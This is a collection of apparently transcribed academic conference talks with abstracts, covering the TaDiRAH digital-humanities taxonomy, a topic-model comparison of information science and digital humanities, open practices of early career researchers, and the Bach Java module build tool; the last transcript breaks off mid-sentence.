and expand the available data into a taxonomy. TaDiRAH resulted from a joint effort of several research projects at the time that had a similar interest in categorizing the available data. While NeDiMAH, the Network for Digital Methods in the Arts and Humanities, followed a rather theoretical approach as well, aiming to build a far-reaching authority, DARIAH, DiRT, and DHCommons had very practical use cases, where bibliographical data, research tools, and research projects were to be categorized and made available online. Therefore, it made sense to form a transatlantic and interdisciplinary alliance to build a taxonomy together. While TaDiRAH is rooted in those projects, it never had funding of its own. The taxonomy's original aims are still valid today. It is designed to organize and categorize DH content and follows a pragmatic approach, rather than aiming for completeness and perfection, in order to make it usable for a wide range of disciplines that operate digitally. At the same time, this deliberately pragmatic and practical approach enables ongoing development and participation of the community. TaDiRAH also set out to make visible the activities of a field that, of course, was not new, but that had by then built some discipline-like structures in terms of scientific and/or political relevance and visibility. Let me give you a brief example of community engagement when designing the original taxonomy. This is almost a bit of oral history here. This is from the first suggestion that we shared with the community to get feedback from all kinds of digital humanities scholars from various disciplines. We used a simple Google Doc that was open for everyone to comment.
You can see the screenshot on the right, even though you can't read it — you can see there are a lot of comments there. And we received all those suggestions on terminology and the scope notes. There's a little magnified selection on the left of the slide. Those then served as input for another round of revisions that kept us busy for a while. To give you an impression of the first result, I would like to give a very short overview. There are seven top-level activities that roughly reflect the order of a research cycle: capture, creation, enrichment, analysis, interpretation, storage, and dissemination, each of them having a set of various methods. Since you can't read it here, I have a little example: in the case of the research activity capture, there are conversion, data recognition, discovering, gathering, and some more. Both the top level and the methods listed beneath them come with scope notes. In addition, there were two loose lists of research techniques and research objects that could be associated with the methods used. However, as you may have understood by now, while a lot of organization had gone into the process by this time, the result did not actually deserve the name of a taxonomy or controlled vocabulary. Until then, it was useful in terms of a critical review of the DH terminology used at the time, but the result did not enable much more than hierarchical keywording. So this is where I hand over to Canan, who will give you some insights on what we did in version 2 to overcome this state. Thank you, Luise. So while TaDiRAH spread over the years, its application did not go, as Luise just told you, beyond keywording. This was both a blessing and a curse. Finding and accessing resources was possible, but TaDiRAH version 1 could not meet the objective of establishing interoperability or reuse in the sense of the FAIR principles. In order to eliminate the vagueness and to optimize the use for the growing DH community, the need arose to revise and harmonize the structure and the semantics of the model. This includes the terms and the definitions related to research activities and techniques, and also expanding the model on the basis of community usage. In order to create a consistent and coherent conceptualization as the basis for further formalization, one of the main tasks was to define criteria for top- and sub-concept descriptions. These scope notes should not be too narrow or too broad, should contain either no delimitation to other terms or an explicit one, should not contain any contradictions or negative definitions, should not include several definitions within one scope note, and should avoid redundancies with other definitions and unnecessary references. Finally, the concept terms should be written consistently in lower-case letters and as gerunds. The harmonization of the existing conceptualization was supplemented by model expansion, based again on community engagement, like the evaluation and aggregation of existing implementations such as TAPoR or CLARIAH-DE, and these so-called new aggregated concepts were further enriched with external Wikidata definitions. At tadirah.info, you can find an interactive visualization of the new TaDiRAH version 2 model. Besides the redesign of TaDiRAH, the new version 2 was transformed, formalized, and implemented in standardized SKOS. The Simple Knowledge Organization System is developed specifically for the representation of controlled vocabularies and taxonomies.
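To give a rough idea of what such a SKOS representation can look like in practice, here is a small sketch using Python's rdflib. The concept, its namespace URI and the label and note texts are hypothetical and only for illustration — this is not the actual TaDiRAH data:

```python
from rdflib import Graph, Literal, Namespace
from rdflib.namespace import RDF, SKOS

# Hypothetical namespace and concept URI, purely for illustration.
TAD = Namespace("https://example.org/tadirah/")

g = Graph()
g.bind("skos", SKOS)

concept = TAD["capturing"]
g.add((concept, RDF.type, SKOS.Concept))
g.add((concept, SKOS.prefLabel, Literal("capturing", lang="en")))
g.add((concept, SKOS.prefLabel, Literal("Erfassung", lang="de")))
g.add((concept, SKOS.scopeNote,
       Literal("Self-written note describing the intended scope.", lang="en")))
g.add((concept, SKOS.definition,
       Literal("External (e.g. Wikidata) definition would go here.", lang="en")))
g.add((concept, SKOS.broader, TAD["research-activity"]))

# Serialize to Turtle, the same RDF format mentioned for the vocabulary export.
print(g.serialize(format="turtle"))
```

The same pattern — one skos:Concept per activity, multilingual labels, and skos:scopeNote versus skos:definition to separate self-written notes from external definitions — is what the following description refers to.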
Just to give you a few examples: as a formal language based on RDF, concepts are represented in a hierarchy, each with a unique identifier and assigned multilingual labels, but also a mapping to version 2. Information about the meaning of a resource is held by the properties skos:scopeNote and skos:definition, and these two properties serve to distinguish the self-written scope notes from the external Wikidata definitions. Version 2 has been permanently published on the DARIAH-EU Vocabs server since summer 2020. This service is operated by the Austrian Centre for Digital Humanities and Cultural Heritage of the Austrian Academy of Sciences, one of the partners in the CLARIAH consortium. The open source software Skosmos is used for display and search, and the software works natively on a triple store database providing a SPARQL endpoint. The RDF export of the vocabulary can be downloaded in Turtle format, and thanks to the licensing of the TaDiRAH vocabulary under the CC0 public domain license it can be freely reused. Let me now summarize some major revisions. Version 2 represents an extended and refined model on the basis of community usage; it includes revised scope notes and links to Wikidata definitions. It also includes translations on the concept level in German, French, Spanish, Portuguese, Serbian, and Italian, and maybe in the future also in Japanese or Norwegian. It is standardized SKOS and published open source under a CC0 public domain license. So, coming to our outlook. Version 1 was developed on the basis of a hermeneutic and iterative approach that was discussed intensively with the community. For this reason, we expect continuous model development, for example regarding the revision of the multilingual terminology and scope notes of version 1. The community is also invited to further develop the model in terms of content and structure. We expect an ongoing conceptualization and multilingual transformation of research objects. We also expect the admission and specification of highly relevant Wikidata definitions as core scope notes, and for this purpose an approach was developed which, through the link with Wikidata, enables missing definitions to be added and ideally to be converted iteratively into high-quality scope notes. In addition, our workflows for maintenance, development, and quality management are also based exclusively on community engagement and commitment. A TaDiRAH board will be responsible for process management in the future, and this board consists of the original core team, new developers, and other contributors. Now let's have a final look at what experiences we have distilled from this case study. The concept-oriented character of SKOS enables the structuring of generic hierarchies. Because of this, searching- and indexing-related use cases are perfectly compatible. However, a representation of higher granularity and more complex semantics is not really possible with SKOS. Of course, it would have been possible to design a higher level of formalization; however, this again would not really be appropriate for the addressed application goal. Based on a practice-oriented usage scenario and limited by the few available resources, a pragmatic approach was therefore pursued in which a consistent vocabulary was developed as a smallest common denominator, which limits the general scope for interpretation without losing semantics. The interdisciplinary project work required fruitful but constant negotiation with one another.
Low-threshold modeling and dynamic community involvement are essential for increased use, reuse, and acceptance. And with FAIR, basic strategies for data-driven research and teaching, as well as optimal processing of research data, are defined. The assessment of whether the FAIR principles are met or not always depends on the context in which TaDiRAH is involved: while the principles can be fully adhered to within one research system, they may no longer be adequately fulfilled in interaction with others. The practical research use value is increased through standardization and the associated greatest possible infrastructural connectivity. The two platforms, Vocabs and tadirah.info, offer user-friendly searchability, retrievability, and citability. So we remain true to the original principle and just keep it pragmatic. Thanks for your attention.
Classifying and categorizing the activities that comprise the digital humanities (DH) has been a longstanding area of interest for many practitioners in this field, fueled by ongoing attempts to define the field both within the academic and public sphere. Several European initiatives are currently shaping advanced research infrastructures that would benefit from an implementation of a suiting taxonomy. Therefore, new humanities and information science collaborations have been formed to provide a service that meets their needs. This working paper presents the transformation of the Taxonomy of Digital Research Activities in the Humanities (TaDiRAH) in order to make it machine-readable and become a formalized taxonomy. This includes the methodology and realization containing a complete revision of the original version, decisions in modelling, the implementation as well as organization of ongoing and future tasks. TaDiRAH addresses a wide range of humanities disciplines and integrates application areas from philologies as well as epigraphy, and musicology to name just a few. For this reason, the decision in favor of SKOS was made purely pragmatically in terms of technology, concept and domains. New language versions can now be easily integrated and low-threshold term extensions can be carried out via Wikidata. The new TaDiRAH not only represents a knowledge organization system (KOS) which has recently been released as version 2.0. According to the FAIR principles this new version improves the Findability, Accessibility, Interoperability, and Reuse of research data and digital assets in the digital humanities.
10.5446/52971 (DOI)
Hello, this is Manuel and Jan from the Computational Humanities Group at Leipzig University, and we are delighted to present our ongoing research at ISI 2021. Our paper title is "A Bit of a Monster", so just let me summarize it in the following way. We are interested in the disciplinary relationship of information science and digital humanities, and the method we use for our study is rooted in scientometrics, as we compare large corpora of academic journals from both disciplines. We investigate the relationship on the level of shared topics, which we identified using LDA in combination with a hierarchical clustering approach that leads to an improved topic quality. All right, so to get started, let me remind you of the conference theme of this year's ISI, which says: information science and its neighbors — from data science to digital humanities. This already indicates that there seems to be some kind of relationship between information science and digital humanities. And indeed this relationship has been discussed extensively before. At ISI 2015, for example, Lyn Robinson and others discussed whether library and information science and the digital humanities might have a joint future, as there are obviously many connecting factors between both fields. Roberto Busa, a famous name in the digital humanities, was also one of the first to highlight the documentaristic current of the digital humanities, and he stressed that information infrastructure was an important focus in the digital humanities from its very beginnings. Others have conducted scientometric studies to reveal that many authors of DH journals and conference publications are actually people coming from information science. So at this point one might say that many information scientists have simply widened their scope and emigrated into the unexplored country that is digital humanities. And to be honest, that is exactly what happened to me. I finished my PhD a couple of years ago in information science — in Regensburg, actually — and I emigrated to Leipzig to become a professor of digital humanities a few years later. So in retrospect this personal evolution of mine does not seem that unlikely if we look at these recent statistics on the development of professorships in both information science and digital humanities — in Germany, one must add. Here we certainly see a difference between the two disciplines. You see that in the last 10 years there have been 22 new professorships in the digital humanities, while information science is more or less stagnating and has increased only by half a position. Looking at the number of places where digital humanities has been institutionalized, we find an increase of 16 new places, while information science on the other hand has been reduced from 7 to 5, so it has lost two places. Seeing these sheer numbers of how the two disciplines have developed in the last 10 years, suddenly this whole "information science and digital humanities are more or less the same" gets a whole different flavor, because it is certainly not reflected in these numbers, which strongly favor digital humanities over information science. And honestly, if digital humanities and information science are largely the same, but all the money goes to DH instead of information science, there should be some resistance against the new kid DH from the side of information science.
And indeed we also find many critical voices, for example Glatney, who compares various definitions of information science and DH and comes to the conclusion that DH is actually nothing but an unneeded invention: DH does nothing new that has not been done by information science before, and DH is basically just there to steal money from information science. So while I personally like the friendly neighborhood metaphor that this year's ISI theme conveys, I also believe it is crucial to distinguish the two disciplines from each other. And this is important not only from an IS perspective but also from a DH perspective, where I personally, as a DH professor, struggle with the big tent metaphor that is often used in DH and that deliberately blurs the boundaries of digital humanities as a discipline in its own right, as it invites anybody to join the big tent DH. Again, this is a very diplomatic metaphor — just opening a big tent — but its negative implications have been summarized very well by Melissa Terras in the following way. She says: if everyone is a digital humanist, then no one is really a digital humanist. The field does not exist if it is all-pervasive, too widely spread, or ill-defined. And Terras also highlights that the big tent metaphor entails, or may entail, a crisis of inclusion that makes it very hard to distinguish digital humanities from other disciplines like, for example, information science. Well, I hope by now it has become clear why information science and digital humanities, despite all the synergies, similarities and overlaps, should have an equal interest in clearly distinguishing themselves as scientific disciplines. And that is basically the motivation for this study and this paper: we present a scientometric study in which we compare the two disciplines to each other in order to identify unique scholarly practices, characteristics and research topics that allow us to distinguish information science and digital humanities from each other. It should be noted that a number of scientometric studies have been done before, but none of them has explicitly investigated the relationship to information science, and none of them so far has relied on topic modeling as an approach. So yeah, here we are presenting a scientometric comparison of academic journals from both information science and digital humanities using LDA topic modeling in combination with hierarchical clustering, and this is where I hand it over to Jan, who will present some more details on the corpus construction and our take on LDA for this specific task. Hi everyone, my name is Jan and I will give you a quick overview of our methodology. For our study we designed a corpus of research articles published between 1990 and 2019 in five selected journals. For information science we selected the Journal of Documentation and JASIST. For the digital humanities we selected Computers and the Humanities, which in 2005 was renamed to Language Resources and Evaluation; Literary and Linguistic Computing, which was renamed to Digital Scholarship in the Humanities in 2015; and Digital Humanities Quarterly, which was first issued in 2007. We considered these to be well-established and exemplary journals of the two fields. However, we must be aware that they represent only a small part of the international research discourse in these fields, so our study is totally biased towards US and Western European research.
Also, these selected DH journals tend toward linguistic and literary research, so other areas of the digital humanities such as digital history, musicology or geography may be underrepresented in our study. We retrieved all published articles available to us without any specific query or pre-filter. They were obtained as PDF files via the Crossref API and via Oxford Academic; Digital Humanities Quarterly articles were retrieved via the website as TEI XML. All in all, these amount to 6,498 articles consisting of approximately 43 million tokens. If we look at the number of articles per year and journal, we can clearly see that there are many more articles from JASIST than from the other journals. Also, the number of articles in the 2010s is much higher than in the 1990s. To ensure a balanced impact of decades, disciplines and journals on the topic model, we performed topic modeling on stratified sub-samples of the corpus; I will come back to this in a moment. Our PDF files were converted to TEI XML using the tool GROBID. From these XMLs we extracted the full texts of the articles. These were then tokenized, lower-cased, part-of-speech tagged and lemmatized using spaCy. We chose to perform topic modeling exclusively on nouns and proper nouns for reasons of efficiency. We also chose to extract and concatenate collocations using a normalized pointwise mutual information threshold. These were filtered to contain at least one noun or proper noun, which resulted mostly in terminological noun phrases. Finally, all terms which occurred in less than one percent of the articles were filtered out, resulting in approximately 6,700 feature terms. For topic modeling we relied on a widely used implementation of latent Dirichlet allocation, or LDA, in the Java framework MALLET. One of the major pitfalls of LDA and topic modeling in general is the unreliability of its results. We therefore adapted a workflow for aggregating multiple results of LDA into one stabilized topic model, originally proposed by Vega-Carrasco et al. in 2020. It involves, in a first step, determining an appropriate number of topics; then, in a second step, running LDA a number of times — in our case 20 times — using this number of topics; and in the end merging all resulting topics into one stabilized topic model using hierarchical agglomerative clustering on distances between the topics' term probability distributions. Each step is evaluated using four evaluation metrics: perplexity, topic coherence, topic stability, and topic distinctiveness. And as mentioned, the number of articles per journal and decade varies a lot in our corpus. Therefore we performed each of the 20 LDA runs on a new stratified random subsample of our corpus to ensure that each discipline and decade has an equal impact on the results. Each subsample is made up of 2,400 articles stratified by decade, discipline and journal. At the end of this process we have a clustered topic model which only consists of topics which appeared across multiple runs of LDA, each of which was fitted on a different random corpus subsample. If you'd like to know how this works technically, we would like to refer you to the original proposal by Vega-Carrasco et al. and also to our paper, in which we describe everything in more detail. And now back to Manuel, who will present our interpretation of the final topic model. Thank you. Okay, it's my pleasure to summarize some of our main results that we were able to derive from the clustered topic model that Jan just introduced.
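Before the results, here is a rough illustration of the aggregation workflow just described. This is not the authors' actual MALLET-based pipeline — the sketch below uses spaCy, gensim and SciPy instead, with toy input texts and placeholder parameter values:

```python
import numpy as np
import spacy
from gensim.corpora import Dictionary
from gensim.models import LdaModel
from scipy.cluster.hierarchy import fcluster, linkage
from scipy.spatial.distance import pdist

# Preprocessing: keep lemmatized, lower-cased nouns and proper nouns.
# (assumes: python -m spacy download en_core_web_sm)
nlp = spacy.load("en_core_web_sm")

def noun_lemmas(text: str) -> list[str]:
    doc = nlp(text)
    return [t.lemma_.lower() for t in doc
            if t.pos_ in ("NOUN", "PROPN") and t.is_alpha]

articles = [  # toy stand-ins for the full-text corpus
    "Information retrieval systems rank documents for user queries.",
    "Digital editions encode literary texts for distant reading.",
    "Citation analysis measures the impact of journal articles.",
]
documents = [noun_lemmas(a) for a in articles]

# Several LDA runs, then cluster the resulting topics.
dictionary = Dictionary(documents)
corpus = [dictionary.doc2bow(d) for d in documents]

n_topics, n_runs = 2, 3   # placeholders; the study used 20 runs on subsamples
topic_rows = []
for seed in range(n_runs):
    lda = LdaModel(corpus, id2word=dictionary, num_topics=n_topics,
                   random_state=seed, passes=10)
    topic_rows.append(lda.get_topics())        # (n_topics, vocab_size)

all_topics = np.vstack(topic_rows)             # topics from all runs stacked

# Hierarchical agglomerative clustering on distances between the topics'
# term probability distributions (Jensen-Shannon chosen here as the metric).
Z = linkage(pdist(all_topics, metric="jensenshannon"), method="average")
labels = fcluster(Z, t=n_topics, criterion="maxclust")

# Merge each cluster of recurring topics into one stabilized topic.
stabilized = np.array([all_topics[labels == c].mean(axis=0)
                       for c in np.unique(labels)])
print(stabilized.shape)
```

In the study itself, each LDA run is additionally fitted on a new stratified subsample, and each step is evaluated with the metrics mentioned above.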
After the whole process we are left with a final aggregated model that features 87 topics. This plot here shows an overview of the distribution of the mean topic probability across information science and digital humanities. The topics are sorted by the relative difference between the discipline-specific probabilities. On the left and right sides, the plot clearly shows that there are a number of topic clusters that are rather characteristic of either information science or digital humanities. So here we can already see that there seem to be characteristic topics for both disciplines, as well as some shared topics, which are to be found in the middle of this plot. This next plot shows a spatial overview of the overall topic space of the 87 topics. What you see here is a UMAP 2D projection of the topic distances based on the transposed document-topic probability matrix. And what you see here are the 87 topics. The bubble size reflects the overall average topic probability — the bigger, the higher the probability of the topic. The color of a topic indicates whether it shows a statistically significantly higher probability for either DH or information science: blueish is information science, red-brownish is digital humanities. And the position of the topics in this 2D projection indicates co-occurrence with other topics in the corpus. Based on this position information in the plot, we can now manually annotate clusters of topics to identify larger topic areas. And interestingly, larger clusters seem to emerge for both information science and digital humanities, which you can see here. Typical topic areas for information science seem to be information retrieval, scientometrics and citation studies, as well as information seeking behavior and user studies. DH, however, seems to be more focused on the topic area of distant reading and digital editions, as well as on a cluster which we labeled computational linguistics and corpus linguistics. Let me note that there are also, as you can see here, a number of singular topics that are rather unique to either information science or digital humanities. For instance, hypertext and knowledge management are two very blueish topics for information science, whereas multimodal and games are two topic bubbles that are more characteristic of digital humanities. As we are a bit short on time in this presentation, I won't have enough time to talk about the details of all these single topics, but they are listed in the paper — just take a look there to find out more about them. Okay, I would now like to zoom in on one of those topic areas that are typically associated with information science: the topic cluster, or topic area, of information retrieval. And I want to highlight why this is actually more closely related to information science than to digital humanities, as one might expect that typical techniques from information retrieval might also occur in digital humanities. However, looking at the single topics here it becomes obvious that information retrieval really deals with fundamental topics that are relevant to information science — fundamental IR topics such as classification, taxonomies, document representation, indexing techniques, etc. If we also take a closer look at a typical DH topic, the distant reading and digital editions topic, it becomes evident that these are very specific topics for DH indeed, topics that don't typically bother people from information science.
So this cluster here is very much focused on literary studies — computational literary studies — which means that both the annotation and modeling of literary works by means of TEI/XML as well as their computational analysis by means of stylometry and other methods are typically the subject of the topics to be found here. So while we have seen that both information science and digital humanities have very specific methods, there are also some shared topics, mostly on the methodological and conceptual level. On the methods level, we find machine learning algorithms for pattern recognition and information extraction. We see statistical tests, but also techniques for network analysis and topic modeling. We also have a few overlaps on the conceptual level. For example, both disciplines seem to deal with modeling practices and epistemological theory, and there are further singular shared topics to be found on the level of resources, I would say — for example digitization and new media, software systems and frameworks, but also institutions, like information institutions, and the overall topic of information literacy. So to sum up our results: they suggest that the generally expected overlap between information science and digital humanities is mostly on the methodological and conceptual level, and all in all our results indicate that despite rather occasional overlaps there is still enough uncontested space for both information science and the digital humanities to thrive as individual disciplines and to further develop unique research agendas and study programs. So what's next? Well, I think most of you have already realized that one of the core topics of digital humanities, namely computational linguistics, is of course also a field in its own right. So although we were able to show that DH and information science can be distinguished from each other fairly well, this opens the question whether DH instead largely borrows from other disciplines, like for example computational linguistics. And that's what we are looking into right now. In order to investigate the relationship of DH to computational linguistics and many other disciplines, we are currently working on a multidisciplinary, scientometric study that takes a closer look at this. And as you can see here, this plot already confirms that DH seems to be pretty comfortable sitting between information science and computational linguistics, and also, to a certain degree, literary studies. So if you're interested in this topic, stay tuned for upcoming publications featuring this plot and many other interesting insights. And as I think the time is up by now, I want to thank you for listening, and we are looking very much forward to the discussion.
In this paper we investigate the relationship of information science (IS) and the digital humanities (DH) by means of a scientometric comparison of academic journals from the respective disciplines. In order to identify scholarly practices for both disciplines, we apply a recent variant of LDA topic modeling that makes use of additional hierarchical clustering. The results reveal the existence of characteristic topic areas for both IS (information retrieval, information seeking behavior, scientometrics) and DH (computational linguistics, distant reading and digital editions) that can be used to distinguish them as disciplines in their own right. However, there is also a larger shared area of practices related to information management and also a few shared topic clusters that indicate a common ground for – mostly methodological – exchange between the two disciplines.
10.5446/52976 (DOI)
We'll do it in English because I have English slides, and later on we can switch to German. Yeah, thank you very much. I will give a quick report, hopefully, on the project that was funded by the Leibniz Research Alliance Open Science, which I did together with my colleague Ina Blümel from the TIB Hannover and with Lambert Heller as well. It is on open practices of early career researchers in the educational sciences, and it is a qualitative study. I will shortly introduce what we mean by open practices in research and education, come to the research goal and questions, introduce the study design and our target group, and then show preliminary results of the qualitative analysis. First, to make it clear: we refer to practices in this study as practices you do in your daily life related to any research or teaching context. With regard to open science practices, you might have heard of terms like open access, open source, or open data. Those ideas are associated with potentials that arise with technical innovations. After the printing press, the Web 2.0 was said to bring the second scientific revolution that would change research practices, due to the fact that we now have different options to communicate and to collaborate in a digital space — Nielsen talks about networked science. Similarly, open educational practices are associated with technical innovations as well. A prominent idea is that of openly licensed and freely available learning material, or OER — you heard about it in the morning talk by Sylvia Kuhlmann. And one definition of open educational practices is that they include not only OER use and creation, but also open pedagogies, collaboration, and communication within teaching contexts. The goals of open science and open educational practices are similar and again show a strong connection to digital tools and spaces: we talk about digital access to resources, transparency, the reuse and sharing of resources. And of course, participation is a crucial aspect in both concepts. This again relates to situations where people share and use information and where they use digital resources and tools — aspects that are investigated within human information behavior. One goal here is, as Steiner-Rober formulated in her study, to investigate human behavior for the designing of value-added information services, systems, and products for researchers. My colleague and I both work at an information infrastructure center where we have similar goals. Our study was mainly driven by the knowledge that people support open practices but do not practice them. I will cite one study here, a recent survey among PhD students at the Max Planck Society; there are many other studies with similar results. The survey asked about 560 PhD students about their attitudes towards and awareness of open science practices and their intentions to apply them. And you can see, as in other studies, that the attitudes are positive and many early career researchers are aware of open science practices. They do not practice them commonly — it's not a default yet — but the intentions are high. In general, you can see that there's still a gap between the attitude towards open science and actual practice. And of course, it has to be mentioned that this differs among the different disciplines and subjects we have in research.
So the research questions I talk about in this talk are: which open practices did early career researchers choose to test, for which reasons, and which experiences did they have? We wanted to have a participatory approach and not determine the open practices ourselves and have participants carry them out; instead, we let participants choose open practices themselves. They should apply them in their daily life in research and teaching contexts, and then we let them reflect on their application and experiences. On the right-hand side, you see the study design, the main steps: we had an interview first, a single interview with each participant, then a workshop we held together. Then the participants chose their scenarios, their open practices, and in diary entries they reported back on their experiences to us, either in text or in audio. We had a second interview with each participant and a final — due to Corona — online workshop. We had two phases of the study because in the first recruiting phase we did not find many participants, some dropped out, and some did not attend the physical workshop here in Frankfurt. I will report on the results of the inductive coding, mainly the coding of the interviews and the diary entries. A short note on the target group: we decided on early career researchers in the broad field of educational sciences. On the right-hand side, you can see their fields of research; they have different backgrounds within the educational sciences. We defined early career researchers as PhD candidates or postdocs with a low academic age. You can see we mostly had postdocs. The three PhD candidates did not take part in the whole study, due to job changes and so on. Regarding this group, interestingly, there are some studies or research that discuss whether early career researchers might be the harbingers of change in research practices: they might be more aware of digital technologies and might be willing to apply them. However, as we all know, early career researchers need to decide whether to apply accepted practices to gain a better reputation within their fields and to expand their research network, or to apply new open practices. So we had 10 participants in the study. I will now show the results on the first research question: which open practices did they choose to test and for which reasons? We mainly found four reasons, which are summarized here. Motivational goals are, for example, to be more independent with open tools and not be dependent on proprietary software; to allow for better outreach and transparency of workflows — that was mainly in the research context; to improve students' communication and collaboration literacy — that was in the educational context; and to improve collaboration and communication amongst colleagues and different groups of peers within and beyond their research field. On the right-hand side, you'll see the chosen scenarios. I wrote them down here: either the application of a specific tool — an online tool like CryptPad, for example — or there are kinds of learning or teaching scenarios, or other scenarios like opening up an established open science discussion group, or designing a student course hour or a flipped classroom, for example. So then I come to the second question: which experiences did the participants have with those chosen scenarios? I will summarize three main points here. One was, and this was very prominent, of course, the usefulness and the ease of use of the applied tools.
The ease of use is, for example, concerned with user friendliness and tool functions, where the participants experienced some barriers and could not use the tools as they intended to. For example, the tool the students used in one case did not have an upload function, and the main goal was to have a collaborative space where they discuss their results and share them. With regard to usefulness, I have two citations here from participants. For example, participant nine reports that students did not see the necessity to create and share literature collectively, thus they were not engaged to use the tool, in this case Zotero, the open source reference management system. Another experience is that Unpaywall does not have any benefit compared to other search tools, like, for example, Google Scholar or ResearchGate. So the usefulness was very prominent, and that's a factor which could still be improved in the digital tools. Another point was the reflections and reasonings with regard to other people involved in the open practice context. For example, there were barriers with regard to competencies, as participant three experienced. He wanted to use an online pad, and he said, we switched to rich text instead of code, although he would have preferred code to make it more reusable. But he said it's easier for everyone — it was a research group, and they had to come to a compromise in this practice. Another example is what I described as a kind of reservation, or reluctance, about using new tools. Participant two said that in the first weeks it was difficult to persuade colleagues to use the tool. Later on he reported that they could not access the pad — they had a small issue with the access — and then everyone got very frustrated, so they switched to Word immediately. This, again, is also a kind of usefulness, or maybe ease of use, issue. However, he was not sure it was only the technical issue with the pad; he said it was more that his peers were not used to this tool. There are some other examples in this category, which was very prominent as well, and which I described as motivation and benefits. One example, similar to the one before, is that people do not use the new tools. Participant three wanted to introduce RocketChat as it would be more efficient for small communications, more efficient than email. He was very careful and gave instructions: he wrote a short document where he explained what RocketChat is, which functions it has, and also reported on the data privacy aspect — it was an internal university installation. So he was very careful, sought help, and was supported by the IT department. But again, while using the tool, he reported that of the quite large and diverse research group only 10% were active, 60% were lurking, and the rest only signed in. So he was a bit sad at the end that just a few people really used what in his case was a useful tool. Another example from the teaching context, from participant nine, was that the student groups could write down their results in an online pad, but they did not do it voluntarily, and that was very frustrating for the teacher. At the end she reasoned that she needed to activate the intrinsic motivation of students to do open practices, but she didn't find out, or isn't sure, how to do that properly.
And another reporter with regard to the benefits, very similar and participant one said, I conclude to teach collaborative note taking properly as students have no experience and do not see the benefits of the specters. So this is an example where the open tool was easy to use and the students liked it. But the barriers rather within the teaching, with teaching the concept and benefits of collaborative open work tasks. Of course, they were all self-critical as well the participants. And the two statements here are that participant nine was very engaged in open practices within teaching said takes discipline to continue and not to reduce didactics to a minimum which sometimes works better. And let's skip the last one and come to the final slide to the conclusion. So the usefulness of tools and technical infrastructure still needs to be improved. There were many issues here, still many issues. For one funny example is that the engaged teacher had a course and it was before Corona. And the course room only had one black socket and the students had hard times to use their notebooks because they couldn't, they had low energy. And another conclusion is what a participant described with value alignment. So all involved people need to see the benefits of the new practices. Otherwise it's very they won't stay tuned to use them again. And just one sentence to the limitations. So the participants still have a positive attitude towards open science. They see some hurdles in the practices. And what we saw in the study is that one year is a bit too short to observe the practices because many participants did want to try more open practices and scenarios. But they just didn't have the chance within this year due to other obligations. OK, thank you very much.
Many researchers have a positive attitude towards open science and are motivated to apply them. However, applying them requires a change in one’s daily practices. Different factors might challenge a behavioral change. The introduced study wants to get deeper insights into the reasons and influences that lead early career researchers to apply open practices in their daily research and teaching work. The participatory design let ten participants choose open practices they wanted to learn and adapt in either research or teaching scenarios. The study accompanied them and collected their positive and challenging experiences via diverse methods like interviews, diary entries and workshops. This paper introduces the study design and preliminary results.
10.5446/52789 (DOI)
Hi, my name is Christian and I'm still working on Bach. Bach builds Java modules, Bach builds on Java modules, and Bach builds only Java modules, using Java only. The Java Development Kit contains a set of foundation tools like a compiler, an API doc generator, an archive manager and others, and most of the time the output of one tool is the input of one or more other tools. None of those tools guides us in one go from processing Java source files into shippable products, be it a standalone custom runtime image or modular JAR files. There exists, however, an implicit workflow encoded into the options of those foundation tools. With the introduction of modules in Java 9, some structural parts of that workflow got promoted into the language itself as module descriptors. You can see two of those sketched over here. You have a module definition keyword and the name of a module, followed by a body of the module which contains directives. Here you see there is an org.astro module required by the com.greetings module, and the org.astro module is defined over here and exports a package called org.astro. If you think you have seen those module descriptors before, that's absolutely possible, because I based them on the jigsaw quick start guide, which I have over here in my integration tests. If you want to brush up your modular experience, head over to this URL and read the guide again — or for the first time, it's never too late. Here you see the modules organized in directories named like the modules themselves, with a package underneath and some classes. Back to the overview, because now we want to use this structural information encoded in the module descriptors and think about a project descriptor, which for this project could look like this. The project descriptor you see here is a strawman syntax example of the internal project model Bach uses. It serves two goals here. In this case it should look very similar to a module descriptor: it has a keyword and a name — the project name in this case — and a project version, which is defined here, and some other directives. The second goal is to assemble and collect all option parameters used by the various foundation tools later in the process in one single place. Based on the information found in a project descriptor, Bach calls the appropriate foundation tools in the right order with the right arguments. Nothing more, nothing less. The generated tool calls could look like these. Here we go: we have a compiler call for two modules in one go, we package both modules one after another, create API documentation and package those HTML files too, and last but not least assemble a custom runtime image which uses the project name as the launcher. And to close this introduction, let's run Bach on this project, without the magnifying glass, using JShell. I'm going to cut this a bit shorter. So here we go: Bach was launched using JShell and a load script, and here it analyzed the structure of the project and called the foundation tools in the right order with the right arguments. Now let's see Bach in action. Last year I ran out of time showing you Gerrit's SpaceFX, so let's see what he improved this year and let's rebuild this project with Bach. So let's open up his SpaceFX project, hosted at github.com. We see here he has a JDK15 branch which is almost up to date with the latest JDK, because 16 is already being prepared now — it's in ramp down phase two. So let's use this one.
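For reference, the two module descriptors from the jigsaw quick start guide mentioned above look roughly like this — a minimal sketch containing only the directives discussed in the talk:

// module-info.java of the application module
module com.greetings {
    requires org.astro;
}

// module-info.java of the library module
module org.astro {
    exports org.astro;
}
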
I prepared a pull request to show Gerrit how Bach would be used. If you are interested you can browse it and the commits I did to get it done, but now, without further ado, head over to the checked-out version in my IDE. Here we go, the project is checked out. Let's examine it a bit. We have the sources, and those are the shared sources for the different targets — Android, iOS and so on — and it always starts with a module. So let's look at what this module is all about. It has a name, spacefx. It requires java.base, which is mandated, but you're allowed to write it down anyway, and we need four other modules from JavaFX. The spacefx module exports the package eu.hansolo.spacefx, which is here. The interesting part, at least for us, is the SpaceFX class, which is a JavaFX application — you can see it down in the magnifying glass — and it contains a main method which does nothing else than passing the thread of control to the JavaFX framework. I prepared this project by downloading the required JavaFX modules into a local directory, just making sure nothing magic is happening. So we've got a library of external modules; everything in this external modules directory is read by the spacefx module, so it will find the JavaFX modules for this platform, which is Windows, as you might have already guessed. Let's launch the game from within the IDE. Works great. We could now play, but no, not yet. So what do we have to do to build it with Bach? First, Bach is smart enough to analyze the project structure by finding the module-info files within the current directory tree, so we can just issue a Bach build command, and Bach is now working on the modules, calls the compiler and creates a modular JAR file. So these are the basics; so far so good. Now let's change some basic properties of the project. We do this by creating a project-info file — which is not really called project-info, because that is not yet supported by Java, and might never be — but there's a technique we can use here: it's a module-info. So let's create one in a predefined folder and let's see what we can do with the project info. We can define several things here, and we start with the basic one: the name, SFX, because everything else is too long. Let's save it, go to the shell and see that our definition in the project-info file — the project-info annotation — has an effect. Next, the version. What does it expect? It's a string. Yeah, here we see — so it's fosdem21. Save, build — no. What happened here? The version was illegal because the version string does not start with a number. Who is complaining? The Java language module descriptor — the parse method in the Version class. So there's nothing we can do about that: versions have to start 